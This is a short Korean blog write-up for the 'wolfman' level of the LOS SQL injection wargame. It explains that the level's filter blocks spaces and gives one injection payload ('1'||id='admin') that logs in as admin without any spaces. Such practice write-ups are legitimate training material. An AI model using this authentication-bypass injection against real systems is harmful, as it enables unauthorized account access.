write-up(web)/los

[LOS] wolfman

chanchand 2023. 1. 22. 00:16
반응형

문제

https://los.rubiya.kr/chall/wolfman_4fdc56b75971e41981e3d1e2fbe9b7f7.php 

 

https://los.rubiya.kr/chall/wolfman_4fdc56b75971e41981e3d1e2fbe9b7f7.php

 

los.rubiya.kr

 

 

 

문제풀이

쿼리문은 pw 파라미터를 받아 id를 반환하는데 이 때, id가 admin일 때 문제가 해결된다.

소스코드를 보면 공백이 필터링 되는 것을 확인할 수 있다.

 

공백을 사용하지 않고 마지막 따옴표를 이용하여 아래와 같이 문제를 해결할 수 있다.

 select id from prob_wolfman where id='guest' and pw='1'||id='admin'"

반응형

'write-up(web) > los' 카테고리의 다른 글

[LOS] orge  (0) 2023.01.22
[LOS] darkelf  (0) 2023.01.22
[LOS] orc  (0) 2023.01.21
[LOS] goblin  (0) 2023.01.21
[LOS] cobolt  (0) 2023.01.21

'write-up(web)/los'의 다른글

  • 현재글[LOS] wolfman

티스토리툴바